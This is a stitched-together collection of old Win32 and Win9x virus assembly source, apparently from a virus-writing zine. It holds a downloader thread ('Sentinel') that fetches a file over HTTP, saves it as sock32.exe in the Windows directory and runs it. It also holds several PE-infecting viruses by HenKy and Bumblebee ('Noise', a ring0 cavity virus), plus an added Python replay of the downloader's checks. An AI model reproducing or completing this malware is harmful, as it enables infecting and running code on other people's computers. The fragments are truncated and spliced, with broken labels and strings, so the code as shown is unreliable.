GetCommandLoop:
cmp byte ptr [esi], ']'
je SaveGetCommand
inc esi
inc edx
dec ecx
cmp ecx, 00h
je ExitInstallerLaunch
jmp GetCommandLoop
SaveGetCommand:
mov [ebp + installer_getsize], edx
mov esi, edi
mov ecx, edx
lea edi, [ebp + installer_get]
rep movsb
InstallerGo:
mov [ebp + installer_launchstatus], 00h
lea eax, [ebp + installerthreadid]
push eax
push 00h
push 1234567h
lea eax, [ebp + INSTALLER_THREAD]
push eax
push 10000h
push 00h
lea eax, [ebp + ACreateThread]
call GETAPI
ExitInstallerLaunch:
ret
INSTALLER_LAUNCH endp
INSTALLER_RECEIVE proc
SaveStack:
pushad
ReceiveData:
push edi
mov eax, [ebp + nrbytes2]
mov esi, dword ptr [ebp + dmHnd]
add esi, eax
push 00h
push edi
push esi
push [ebp + isocketh]
lea eax, [ebp + ARecv]
call GETWAPI
add [ebp + nrbytes2], eax
pop edi
InstallerProceed:
popad
ret
INSTALLER_RECEIVE endp
INSTALLER_STATUS proc
CheckInstallerStatus:
cmp [ebp + installer_launchstatus], 00h
je StatusWaiting
cmp [ebp + installer_launchstatus], 01h
je StatusInstalling
cmp [ebp + installer_launchstatus], 02h
je StatusDone
cmp [ebp + installer_launchstatus], 03h
je StatusConnectionError
cmp [ebp + installer_launchstatus], 04h
je StatusSizeError
jmp ExitInstallerStatus
StatusWaiting:
push 00h
push 28d
lea eax, [ebp + installer_stat00]
push eax
push [ebp + socketh]
lea eax, [ebp + ASend]
call GETWAPI
jmp ExitInstallerStatus
StatusInstalling:
push 00h
push 31d
lea eax, [ebp + installer_stat01]
push eax
push [ebp + socketh]
lea eax, [ebp + ASend]
call GETWAPI
jmp ExitInstallerStatus
StatusDone:
push 00h
push 25d
lea eax, [ebp + installer_stat02]
push eax
push [ebp + socketh]
lea eax, [ebp + ASend]
call GETWAPI
jmp ExitInstallerStatus
StatusConnectionError:
push 00h
push 38d
lea eax, [ebp + installer_stat03]
push eax
push [ebp + socketh]
lea eax, [ebp + ASend]
call GETWAPI
jmp ExitInstallerStatus
StatusSizeError:
push 00h
push 31d
lea eax, [ebp + installer_stat04]
push eax
push [ebp + socketh]
lea eax, [ebp + ASend]
call GETWAPI
ExitInstallerStatus:
ret
INSTALLER_STATUS endp
GetInstallerDelta:
pushad
call InstallerDelta
InstallerDelta:
pop ebp
sub ebp, offset InstallerDelta
AllocateExeMem:
push 1000000h
push GMEM_FIXED
lea eax, [ebp + AGlobalAlloc]
call GETAPI
InstallerWsaStartup:
lea eax, [ebp + mywsadata]
push eax
push 101h
lea eax, [ebp + AWSAStartup]
call GETWAPI
InstallerOpenSocket:
push 00h
push 01h
push 02h
lea eax, [ebp + Asocket]
call GETWAPI
mov [ebp + isocketh], eax
InstallerGetSocketValues:
mov [ebp + mysocket2.sin_family], 02h
push 80
lea eax, [ebp + Ahtons]
call GETWAPI
mov [ebp + mysocket2.sin_port], ax
InstallerConnect:
cmp ecx, 03h
je InstallerConnectionError
push ecx
push 10h
lea eax, [ebp + mysocket2]
push eax
push [ebp + isocketh]
lea eax, [ebp + Aconnect]
call GETWAPI
pop ecx
or eax, eax
jz InstallerSendGetCommand
inc ecx
jmp InstallerConnect
InstallerConnectionError:
mov [ebp + installer_launchstatus], 03h
jmp ExitInstaller
InstallerSendGetCommand:
push 00h
push [ebp + installer_getsize]
lea eax, [ebp + installer_get]
push eax
push [ebp + isocketh]
lea eax, [ebp + ASend]
call GETWAPI
push 00h
push 02h
lea eax, [ebp + crlf]
push eax
push [ebp + isocketh]
lea eax, [ebp + ASend]
call GETWAPI
push 00h
push 02h
lea eax, [ebp + crlf]
push eax
push [ebp + isocketh]
lea eax, [ebp + ASend]
call GETWAPI
ReceiveLoop:
cmp ecx, 400h
jna LastPart
sub ecx, 400h
mov edi, 400h
call INSTALLER_RECEIVE
jmp ReceiveLoop
LastPart:
mov edi, ecx
call INSTALLER_RECEIVE
SearchMz:
xor ecx, ecx
mov edi, dword ptr [ebp + dmHnd]
MzLoop:
cmp word ptr [edi], 'ZM'
je FoundExeMark
inc edi
inc ecx
SearchZm:
xor ecx, ecx
mov edi, dword ptr [ebp + dmHnd]
ZmLoop:
cmp word ptr [edi], 'MZ'
je FoundExeMark
inc edi
inc ecx
FoundExeMark:
mov [ebp + skip], ecx
ZeroWindirString:
mov ecx, 100h
xor eax, eax
lea edi, [ebp + windir]
rep stosb
InstallerGetSetWindowsDirectory:
call GET_WINDIR
call SET_WINDIR
push 00h
push 20h
push 02h
push 00h
push 01h
push 80000000h or 40000000h
lea eax, [ebp + commandline]
push eax
lea eax, [ebp + ACreateFile]
call GETAPI
mov [ebp + ifilehandle], eax
push 02h
push 00h
push 00h
push eax
lea eax, [ebp + ASetFilePointer]
call GETAPI
push 00h
lea edx, [ebp + bytesread]
push edx
push ebx
push edi
push [ebp + ifilehandle]
lea eax, [ebp + AWriteFile]
call GETAPI
InstallerGetRealSize:
lea ebx, [ebp + irealsize]
push ebx
push [ebp + ifilehandle]
lea eax, [ebp + AGetFileSize]
call GETAPI
mov [ebp + irealsize], eax
InstallerCloseFile:
push [ebp + ifilehandle]
lea eax, [ebp + ACloseHandle]
call GETAPI
GetFileSize:
mov edi, dword ptr [ebp + dmHnd]
xor ecx, ecx
InstallerFileSizeLoop:
cmp dword ptr [edi], ':htg'
je InstallerFoundSize
inc ecx
inc edi
cmp ecx, 200h
je InstallerCloseSocket
jmp InstallerFileSizeLoop
InstallerFoundSize:
xor ecx, ecx
add edi, 05h
mov [ebp + sizestart], edi
ExtractFileSizeLoop:
cmp word ptr [edi], 0a0dh
je FoundEndOfSizeString
inc edi
inc ecx
cmp ecx, 10h
je InstallerCloseSocket
jmp ExtractFileSizeLoop
FoundEndOfSizeString:
cld
mov [ebp + sizesize], ecx
mov [ebp + ifilesize], 00h
mov ebx, 01h
mov esi, [ebp + sizestart]
add esi, ecx
sub esi, 01h
Convert2Int:
xor eax, eax
lodsb
sub eax,'0'
mul ebx
add [ebp + ifilesize], eax
add edx, eax
dec esi
dec esi
dec ecx
cmp ecx, 00h
je InstallerCheckFileSize
push ecx
push esi
mov ecx, 10d
mov eax, ebx
mul ecx
mov ebx, eax
pop esi
pop ecx
jmp Convert2Int
InstallerCheckFileSize:
mov esi, [ebp + ifilesize]
mov edi, [ebp + irealsize]
cmp esi, edi
je ExecuteFile
mov [ebp + installer_launchstatus], 04h
jmp InstallerCloseSocket
ExecuteFile:
lea eax, [ebp + lpProcessInformation]
push eax
lea eax, [ebp + lpStartupInfo]
push eax
push 00h
push 00h
push CREATE_DEFAULT_ERROR_MODE
push FALSE
lea eax, [ebp + lpThreadAttributes]
push eax
lea eax, [ebp + lpProcessAttributes]
push eax
lea eax, [ebp + commandline]
push eax
push 00h
lea eax, [ebp + ACreateProcess]
call GETAPI
mov [ebp + installer_launchstatus], 02h
InstallerCloseSocket:
push [ebp + isocketh]
lea eax, [ebp + Aclosesocket]
call GETWAPI
ExitInstaller:
popad
ret
INSTALLER_THREAD endp
FALSE = 0
TRUE = 1
AWriteFile db "WriteFile",0
ACreateProcess db "CreateProcessA",0
AGlobalAlloc db "GlobalAlloc",0
commandline db "sock32.exe",0
dmHnd dd 0
ifilehandle dd 0
ifilesize dd 0
irealsize dd 0
isocketh dd 0
installerthreadid dd 0
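An added example (this editor's Python, not code from the Sentinel listing): the installer thread above validates the download with three small routines, InstallerFileSizeLoop ("gth:" within the first 200h bytes), ExtractFileSizeLoop (digits up to CR LF, at most 15 of them) and Convert2Int (right-to-left with a x10 multiplier), then compares the size on disk with the parsed value and stores 2 (done) or 4 (size error) in installer_launchstatus. The replay below reproduces those checks, including their limits, over two constructed HTTP responses. Assumption, also marked in the code: the WriteFile arguments are not intact in the listing, so the example takes "the bytes from the first MZ onward" as what lands in sock32.exe; the sample responses are constructed.

```python
from typing import Dict, Optional

# installer_launchstatus values, from the INSTALLER_STATUS dispatch and the
# places in INSTALLER_THREAD that store them
STATUS = {0: "waiting", 1: "installing", 2: "done", 3: "connection error", 4: "size error"}

def convert2int(digits: bytes) -> int:
    """Convert2Int: walk the digits right to left with a x10 multiplier; every
    byte simply has '0' subtracted, there is no check that it is a digit."""
    value, mult = 0, 1
    for ch in reversed(digits):
        value += (ch - 0x30) * mult
        mult *= 10
    return value

def content_length(resp: bytes) -> Optional[int]:
    """InstallerFileSizeLoop + ExtractFileSizeLoop: "gth:" must start within the
    first 0x200 bytes; skip 5 bytes; CR LF must then appear within 16 bytes."""
    i = resp.find(b"gth:", 0, 0x1FF + 4)
    if i < 0:
        return None                     # thread closes the socket, status unchanged
    start = i + 5
    end = resp.find(b"\r\n", start, start + 0x0F + 2)
    if end < 0:
        return None
    return convert2int(resp[start:end])

def check_download(resp: bytes) -> Dict:
    """SearchMz + InstallerCheckFileSize. Assumption (the WriteFile arguments
    are not intact in the listing): the bytes from the first 'MZ' onward are
    what is written to sock32.exe, and that size is compared with Content-Length."""
    size = content_length(resp)
    mz = resp.find(b"MZ")               # the listing scans from the very start of the response
    if size is None or mz < 0:
        return dict(status=None, content_length=size, body=b"")
    body = resp[mz:]
    return dict(status=2 if len(body) == size else 4, content_length=size, body=body)

# Constructed responses, not real captures; "MZ\x90\x00\x03\x00" is just the first
# six bytes of a typical DOS stub, not an executable.
OK_RESP = b"HTTP/1.0 200 OK\r\ncontent-length: 6\r\nServer: demo\r\n\r\n" + b"MZ\x90\x00\x03\x00"
SHORT_RESP = OK_RESP.replace(b"length: 6", b"length: 7")

if __name__ == "__main__":
    for r in (OK_RESP, SHORT_RESP):
        res = check_download(r)
        print(STATUS.get(res["status"], "aborted"), res["content_length"], len(res["body"]))
```

Note what the matching rules imply: any header whose name ends in "gth:" satisfies the search, the case of "Content-Length" is irrelevant, a header block longer than 512 bytes or a size with more than 15 digits aborts the install silently, and an "MZ" anywhere in the headers would be taken as the start of the file.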
GET_WINDIR proc
GetWindowsDir:
push 128h ; size of dirstring
lea eax, [ebp + windir] ; save it here
push eax
lea eax, [ebp + AGetWindowsDirectory] ; get windowsdir
call GETAPI
ret
GET_WINDIR endp
SET_WINDIR proc
SetWindowsDir:
lea eax, [ebp + windir] ; change to sysdir
push eax
lea eax, [ebp + ASetCurrentDirectory]
call GETAPI
ret
SET_WINDIR endp
;========================================================================;
Leap:
.code
OriginalHost:
pop ebx
push 00h
call ExitProcess
end FirstCopy
end
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[SENTINEL.ASM]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[MYINC.INC]ÄÄÄ
GMEM_FIXED = 0000h
PROCESS_INFORMATION struct
pi_hProcess HANDLE 0 ;process handle
pi_hThread HANDLE 0 ;thread handle
pi_dwProcessId DWORD 0 ;process id
pi_dwThreadId DWORD 0 ;thread id
PROCESS_INFORMATION ends
PROCESS_INFORMATION_ equ 4+4+4+4
STARTUPINFO struct
si_cb DWORD 0 ;structure size
si_lpReserved LPSTR 0 ;(reserved)
si_lpDesktop LPSTR 0 ;desktop name
sl_lpTitle LPSTR 0 ;console window title
si_dwX DWORD 0 ;window origin (column)
si_dwY DWORD 0 ;window origin (row)
si_dwXSize DWORD 0 ;window width
si_dwYSize DWORD 0 ;window height
si_dwXCountChars DWORD 0 ;screen buffer width
si_dwYCountChars DWORD 0 ;screen buffer height
si_dwFillAttribute DWORD 0 ;console window initialization
si_dwFlags DWORD 0 ;structure member flags
si_wShowWindow WORD 0 ;ShowWindow() parameter
si_cbReserved2 WORD 0 ;(reserved)
si_lpReserved2 LPBYTE 0 ;(reserved)
si_hStdInput HANDLE 0 ;standard input handle
si_hStdOutput HANDLE 0 ;standard output handle
si_hStdError HANDLE 0 ;standard error handle
STARTUPINFO ends
STARTUPINFO_ equ 4+4+4+4+4+4+4+4+4+4+4+4+2+2+4+4+4+4
SEH struct
m_pSEH DWORD 0
m_pExcFunction DWORD 0
SEH ends
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[MYINC.INC]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[WSOCKS.INC]ÄÄÄ
;
; WSocks.inc: include file for windows sockets .
; Designed for TASM5 and Win32.
;
; (C) 1999 Bumblebee.
;
; This file contains basic structures and stuff to work
; with windows sockets.
;
; closes a socket
; socket descriptor
;
extrn closesocket:PROC
; sends data (these sockets are a pain... Unix uses a simple write)
; flags (1 OOB data or 0 normal), length, addr of buffer, socket
; returns: characters sent or SOCKET_ERR on error
extrn send:PROC
; receives data (these sockets are a pain... Unix uses a simple read)
; flags (use 0), length, addr of buffer, socket
; returns: characters received or SOCKET_ERR on error
extrn recv:PROC
; connects to a server
; sizeof struct SOCKADDR, struct SOCKADDR, socket
; returns: SOCKET_ERR on error
extrn connect:PROC
; Structs :o
; sockaddr struct for connection
; modified (for better use)
; if you want the original look for it into a winsock.h
SOCKADDR struct
sin_family dw 0 ; ex. AF_INET
sin_port dw 0 ; use htons for this
sin_addr dd 0 ; here goes server node (from inet_addr)
sin_zero db 8 dup(0)
SOCKADDR ends
; types of sockets
SOCK_STREAM equ 1 ; stream (connection oriented; telnet like)
SOCK_DGRAM equ 2 ; datagram (packets, packets, packets)
; protocol
PCL_NONE equ 0 ; none (define the protocol not needed)
.586P
.MODEL FLAT
LOCALS
EXTRN ExitProcess:PROC
MACROSIZE MACRO
ENDM
; MOV \
; CALL \
; JNZ \ ONLY SIX OPCODES WERE USED.. xDDD
; ADD /
; SUB /
; CMP /
;MOV EAX,[EBP+5]
;TURNS INTO:
; ADD EBP,5
; MOV EAX,[EBP]
;AND SO...
; *INFINITE* THX TO T00FiC FOR THE REDUCED OPCODE SET IDEA AND
.DATA
BUSCA3:
ADD EAX,1
CMP DWORD PTR [EAX],EDX
JNZ SHORT BUSCA3
APIZ:
MOV [EDI],EAX
ADD EDI,4
NPI:
MOV AL,BYTE PTR [ESI]
ADD ESI,1
CMP AL,0
JNZ SHORT NPI
CMP [ESI], AL
JNZ GPI
INFECT:
MOV EAX, OFFSET Win32FindData
ADD EAX,EBP
SUB EAX,OFFSET DELTA
SUB ESP,4
MOV [ESP],EAX
MOV EAX,OFFSET IMASK
ADD EAX,EBP
SUB EAX,OFFSET DELTA
SUB ESP,4
MOV [ESP],EAX
MOV EAX,OFFSET FindFirstFile
ADD EAX,EBP
SUB EAX,OFFSET DELTA
CALL [EAX]
MOV EBX, OFFSET SearcHandle
ADD EBX,EBP
SUB EBX,OFFSET DELTA
MOV [EBX],EAX
LOOPER:
CMP EAX,-1
JNZ SUPPER
WARNING:
MOV EAX,12345678H
ORG $-4
OLD_EIP DD 00401000H
ADD ESP,4
CALL EAX ; SUXXX!!! I DON'T WANT TO WASTE A JMP HERE
SUPPER:
CMP EAX,0
JNZ ALLKEY
PILLE:
CMP ESP,0 ; ESP NEVER IS ZERO
JNZ WARNING
ALLKEY:
SUB ESP,4
MOV EAX,OFFSET OLD_EIP
ADD EAX,EBP
SUB EAX,OFFSET DELTA
MOV EBX,[EAX]
MOV [ESP],EBX
SUB ESP,4
MOV [ESP],EDX
SUB ESP,4
MOV [ESP],00000080h
SUB ESP,4
MOV [ESP],3
SUB ESP,4
MOV [ESP],EDX
SUB ESP,4
MOV [ESP],EDX
SUB ESP,4
MOV [ESP],0C0000000h
MOV EDX,0
SUB ESP,4
MOV [ESP],EDX
SUB ESP,4
MOV [ESP],ECX
SUB ESP,4
MOV [ESP],EDX
SUB ESP,4
MOV [ESP],4H
SUB ESP,4
MOV [ESP],EDX
SUB ESP,4
MOV EBX,OFFSET FileHandle
ADD EBX,EBP
SUB EBX,OFFSET DELTA
MOV ECX,[EBX]
MOV [ESP],ECX
MOV EAX, OFFSET CreateFileMappingA
ADD EAX,EBP
SUB EAX,OFFSET DELTA
CALL [EAX]
MOV EDX,0
SUB ESP,4
MOV [ESP],ECX
SUB ESP,4
MOV [ESP],EDX
SUB ESP,4
MOV [ESP],EDX
ADD EDX,2
SUB ESP,4
MOV [ESP],EDX
SUB ESP,4
MOV ECX, OFFSET MapHandle
ADD ECX,EBP
SUB ECX,OFFSET DELTA
MOV EBX,[ECX]
MOV [ESP],EBX
MOV EBX, OFFSET MapViewOfFile
ADD EBX,EBP
SUB EBX,OFFSET DELTA
CALL [EBX]
Cerrar1:
SUB ESI,MARKA
MOV EBX,ESI
ADD EBX,3CH
MOV EAX,[EBX] ; ONLY SOME W98 HAVE 1000H/1000H INSTEAD OF 1000H/200H
MOV ECX,ESI
ADD ECX,56
CMP EAX,[ECX]
JNZ Cerrar
SUB ESP,4
MOV [ESP],ESI
MOV ECX,0
MOV EDI,ESI
ADD EDI,6
MOV CL,BYTE PTR [EDI]
ADD EDI,74H-6
MOV EBX,[EDI]
ADD EBX,EBX
ADD EBX,EBX
ADD EBX,EBX
ADD ESI,78H
ADD ESI,EBX
ADD ESI,24H
WRI:
MOV DWORD PTR [ESI], 0C0000040h
ADD ESI,40
SUB ECX,1
CMP ECX,0
JNZ WRI
MOV ESI,[ESP]
ADD ESP,4
MOV EDI,ESI
ADD ESI,28H
MOV EAX,[ESI]
ADD ESI,34H-28H
ADD EAX,[ESI]
MOV ECX,[ESI]
MOV EDX,OFFSET BASE
ADD EDX,EBP
SUB EDX,OFFSET DELTA
MOV [EDX],ECX
MOV EBX,OFFSET OLD_EIP
ADD EBX,EBP
SUB EBX,OFFSET DELTA
MOV [EBX],EAX
MOV ESI,EDI
ADD ESI,MARKA
MOV BYTE PTR [ESI],"H" ; HenKy!
MOV EAX,OFFSET WFD_nFileSizeLow
ADD EAX,EBP
SUB EAX,OFFSET DELTA
MOV ECX,[EAX]
MOV EAX,EDI
BU:
CMP DWORD PTR [EDI], 'XGNI'
JNZ PE
CMP ESP,0
JNZ PO
PE:
ADD EDI,1
SUB ECX,1
CMP ECX,0
JNZ BU
CMP ESP,0
JNZ Cerrar
PO:
MOV ESI,EDI
ADD ESI,4
CMP DWORD PTR [ESI], 'DAPX'
JNZ PE
SUB ESP,4
MOV [ESP],EDI
MOV EBX,OFFSET MapAddress
ADD EBX,EBP
SUB EBX,OFFSET DELTA
SUB EDI,[EBX]
ADD EAX,28H
MOV [EAX],EDI
MOV EBX,OFFSET BASE
ADD EBX,EBP
SUB EBX,OFFSET DELTA
ADD EDI,[EBX]
ADD EDI,5
MOV EDX,OFFSET MILO
ADD EDX,EBP
SUB EDX,OFFSET DELTA
MOV [EDX],EDI
MOV EDI,[ESP]
ADD ESP,4
MOV EAX,[ESI]
MOV [EDI],EAX
ADD ESI,4
ADD EDI,4
SUB ECX,1
CMP ECX,0
JNZ BASTARDO_VIRUS
UnMapFile:
CloseMap:
Cerrar:
TOPO:
APIs:
DB "CreateFileA",0
DB "CloseHandle",0
DB "FindFirstFileA",0
DB "FindNextFileA",0
DB "MapViewOfFile",0
DB "UnmapViewOfFile",0
DB "CreateFileMappingA",0
Zero_ DB 0
BASE DD 0
IMASK DB '*.ExE',0
DB 'HenZe LameVirus BY HenKy',0
align 4
APIaddresses:
CreateFile DD 0
CloseHandle DD 0
FindFirstFile DD 0
FindNextFile DD 0
MapViewOfFile DD 0
UnmapViewOfFile DD 0
CreateFileMappingA DD 0
GPA DD 0
SearcHandle DD 0
FileHandle DD 0
MapHandle DD 0
MapAddress DD 0
FILETIME STRUC
FT_dwLowDateTime DD ?
FT_dwHighDateTime DD ?
FILETIME ENDS
Win32FindData:
WFD_dwFileAttributes DD ?
WFD_ftCreationTime FILETIME ?
WFD_ftLastAccessTime FILETIME ?
WFD_ftLastWriteTime FILETIME ?
WFD_nFileSizeHigh DD ?
WFD_nFileSizeLow DD ?
WFD_dwReserved0 DD ?
WFD_dwReserved1 DD ?
FNAME DD 0
DD 0
DD 0
DD 0
DD 0
DD 0
align 4
EXITPROC:
PUSH 0
CALL ExitProcess
ENDS
END MEGAMIX
;
; ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ
; ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ
; Noise ÜÜÜÛÛß ßÛÛÛÛÛÛ ÛÛÛÛÛÛÛ
; Coded by Bumblebee/29a ÛÛÛÜÜÜÜ ÜÜÜÜÛÛÛ ÛÛÛ ÛÛÛ
; ÛÛÛÛÛÛÛ ÛÛÛÛÛÛß ÛÛÛ ÛÛÛ
; ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
; ³ Words from the author ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
; . I started to code an i-worm and I wanted to make something like a
; ring0 stealth routine for it. Then I realized: I had done a ring0 virus, heh.
; The name is due to the little payload it has... which really does make noise!
; That's my first ring0 virus. I don't like coding ring0, but here it is.
; That's a research specimen. Don't expect the ultimate ring0 virus...
; Only 414 bytes, that's less than MiniR3 (aka Win95.Rinim).
;
; ÚÄÄÄÄÄÄÄÄÄÄÄÄ¿
; ³ Disclaimer ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÀÄÄÄÄÄÄÄÄÄÄÄÄÙ
; . This is the source code of a VIRUS. The author is not responsible
; for any damage that may occur due to the assembly of this file. Use
; it at your own risk.
;
; ÚÄÄÄÄÄÄÄÄÄÄ¿
; ³ Features ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÀÄÄÄÄÄÄÄÄÄÄÙ
; . Ring0 resident win9x virus (the way it gets to ring0 only works on
; win9x, not NT and not W2K).
; . It infects in a similar way to MiniR3: it uses the free space in the
; PE header. That's a cavity virus.
; . All the data is INSIDE the code. Well... the copyright is not inside :)
; . It infects PE files in the user buffer when a write call is done.
; That makes this virus not very efficient at spreading.
; . It has a kewl sound payload: it echoes every disk operation on the
; internal speaker ;)
;
; Greetz to Perikles for his tests ;) You're my best tester, you know...
;
;
; The way of the bee
;
.486p
locals
.model flat,STDCALL
extrn ExitProcess:PROC
.DATA
; dummy data
db 'WARNING - This is a virus carrier - WARNING'
.CODE
inicio:
mov eax,VSIZE
cmp al,0bfh
jne NotWin9x
pop edi
pop esi
mov word ptr [esi],di
shr edi,10h
mov word ptr [esi+6],di
NotWin9x:
add esp,8
popad
ring0CodeInstaller:
pushad
mov ebp,0bff70000h
sub ebp,dword ptr [ebp]
jz ReturnR3
push VSIZEROUND
VxDCall IFSMANAGER,GETHEAP
pop edi
or eax,eax
jz ReturnR3
mov edi,eax
call @@delta
@@delta:
pop esi
sub esi,(offset @@delta-offset vBegin)
mov ecx,VSIZE
rep movsb
push eax
add eax,offset ring0Hook-offset vBegin
push eax
VxDCall IFSMANAGER,IFSAPIHOOK
pop ebp
pop edx
mov dword ptr [edx+nextHookInChain-vBegin],eax
mov ebp,0bff70000h
mov dword ptr [ebp],ebp
ReturnR3:
popad
iretd
ring0Hook:
pop eax
push ebp
mov ebp,12345678h
delta equ $-4
mov dword ptr [returnAddr-vBegin+ebp],eax
push edx
mov edx,esp
pushad
pushfd
mov ecx,0ffh
counter equ $-4
dec cl
jz beep
exitHook:
popfd
popad
pop edx
pop ebp
mov eax,12345678h
nextHookInChain equ $-4
call dword ptr [eax]
push 12345678h
returnAddr equ $-4
ret
checkFile:
mov esi,dword ptr [edx+1ch]
mov ebx,edi
cmp word ptr [edi],'ZM'
jne exitHook
cmp ecx,dword ptr [edi+3ch]
jb exitHook
add edi,dword ptr [edi+3ch]
cmp word ptr [edi],'EP'
jne exitHook
mov esi,edi
mov eax,18h
add ax,word ptr [edi+14h]
add edi,eax
mov ecx,VSIZE
xor eax,eax
pushad
rep scasb
popad
jnz exitHook
push edi
sub edi,ebx
xchg edi,dword ptr [esi+28h]
mov eax,dword ptr [esi+34h]
add edi,eax
mov dword ptr [hostEP-vBegin+ebp],edi
pop edi
mov esi,ebp
rep movsb
jmp exitHook
beep:
dec cl
in al,61h
push ax
or al,03h
out 61h,al
mov al,0b6h
out 43h,al
mov ax,987
mov si,ax
beep_loop:
add si,100h
mov ax,si
out 42h,al
xchg al,ah
out 42h,al
loop beep_loop
pop ax
out 61h,al
jmp exitHook
fakeHost:
push 0h
call ExitProcess
Ends
End inicio
;---------------------------- W95 ESPORE BY HenKy -----------------------------
;
;-AUTHOR: HenKy
;
;-MAIL: HenKy_@latinmail.com
;
;-ORIGIN: SPAIN
;
; WOW!!!! 140 BYTES !!!! AND 100% RING 3 !!!! (ONLY WINDOZE 9X CAN SUPPORT IT)
; PRIVILEGES
; THE INITIAL EDX VALUE POINTS TO A 28KB CACHE BUFFER WHICH CONTAINS SEVERAL
.386P
.MODEL FLAT
LOCALS
EXTRN ExitProcess:PROC
MIX_SIZ EQU (FILE_END - MEGAMIX)
MACROSIZE MACRO
DB MIX_SIZ/00100 mod 10 + "0"
DB MIX_SIZ/00010 mod 10 + "0"
DB MIX_SIZ/00001 mod 10 + "0"
ENDM
.DATA
DB 'BIEN PEKEÑO BIEN... LIKE AN ESPORE... HEHEHE',0
DB ' W9X ESPORE SIZE = '
MACROSIZE
.CODE
VINT21:
DD 0BFF712B9h ; MOV ECX,048BFF71H ;-) Z0MBiE
DB 'H' ; HenKy ;P
XCHG EDI, EAX ; EDI: DELTA
MOV ESI,0C1000000H ; ESI: BUFFER
MOV EBP,EDI ; NOW: EBP=EDI=DELTA=INT21H
PHECT:
XOR ECX,ECX
MOV EDX, ESI
MOV AH, 3Fh
CALL R_W
MOV ECX, [ESI+3Ch]
LEA EAX, [ESI+ECX]
CMP BYTE PTR [EAX], "P"
JNE WARNING
MOV ECX,[EAX+28H]
CMP ECX, 1024
JB WARNING
PUSH EBP
ADD ECX,[EAX+34H]
MOV [EBP+OLD_EIP-MEGAMIX],ECX
MOV EDI,EAX
PORRO:
INC EDI
CMP BYTE PTR [EDI],'B' ; hehehehe
JNE PORRO
INC EDI
SUB EDI,ESI
MOV EDX,EDI
XCHG DWORD PTR [EAX+28h], EDI
LEA EDI, [ESI+EDX]
PUSH MIX_SIZ/4
POP ECX
POP EAX
PUSH EAX
XCHG ESI,EAX
REP MOVSD
POP EDI
MOV EDX, EAX
W:
MOV AH, 40h
R_W:
PUSHAD
XOR EAX,EAX
MOV AH, 42h
CDQ
CALL [EDI]
POPAD
MOV CH, 4h
CALL [EDI]
RET
ALIGN 4
FILE_END:
PUSH 0
CALL ExitProcess
END MEGAMIX
;---------------------------- W95 PUTITA BY HenKy -----------------------------
;
;-AUTHOR: HenKy
;
;-MAIL: HenKy_@latinmail.com
;
;-ORIGIN: SPAIN
;
.386P
.MODEL FLAT
LOCALS
EXTRN ExitProcess:PROC
MIX_SIZ EQU (FILE_END - MEGAMIX)
.DATA
DB '0
.CODE
MEGAMIX:
VINT21:
DD 0BFF712B9h ; MOV ECX,0C3B912F7H ;-) Z0MBiE
RETOX: RET
XCHG EDI, EAX ; EDI: DELTA
MOV ESI,0C1000000H ; ESI: BUFFER
MOV EBP,EDI ; NOW: EBP=EDI=DELTA=INT21H
PUSH ES
PUSH EBX
PUSH DS
POP ES
PUSH ES
POP DS
PUSH 00401000H
OLD_EIP EQU $-4
PUSH EDI
WARNING:POP EDI
RET
PHECT:
PUSH EDI
XOR ECX,ECX
MOV EDX, ESI
PUSH ESI
MOV AH, 3Fh
CALL R_W
MOV ECX,[EAX+28H]
ADD ECX,[EAX+34H]
MOV [EBP+OLD_EIP-MEGAMIX],ECX
MOV EDI,EAX
PORRO:
INC EDI
CMP BYTE PTR [EDI],'B' ; hehehehe
JNE PORRO
INC EDI
POP ECX
SUB EDI,ECX
MOV EDX,EDI
XCHG DWORD PTR [EAX+28h], EDI
LEA EDI, [ESI+EDX]
PUSH MIX_SIZ/4
POP ECX
POP EAX
PUSH EAX
XCHG ESI, EAX
REP MOVSD
POP EDI
MOV EDX, EAX
W:
MOV AH, 40h
R_W:
PUSHAD
XOR EAX,EAX
MOV AH, 42h
CDQ
CALL [EDI]
POPAD
MOV CH, 4h
CALL [EDI]
RET
IMASK DB "*.ZZZ", 0
ALIGN 4
FILE_END:
SF STRUC
DB 1024 DUP(?)
DTA DB 43 DUP(?)
SF ENDS
PUSH 0
CALL ExitProcess
END MEGAMIX
;-------------------------------- W95 ESTUKISTA BY HenKy -----------------------------
;
;-AUTHOR: HenKy
;
;-MAIL: HenKy_@latinmail.com
;
;-ORIGIN: SPAIN
;
; INFECTS *ALL* OPEN PROCESSES AND EVEN ALL DLLS AND MODULES IMPORTED BY THEM
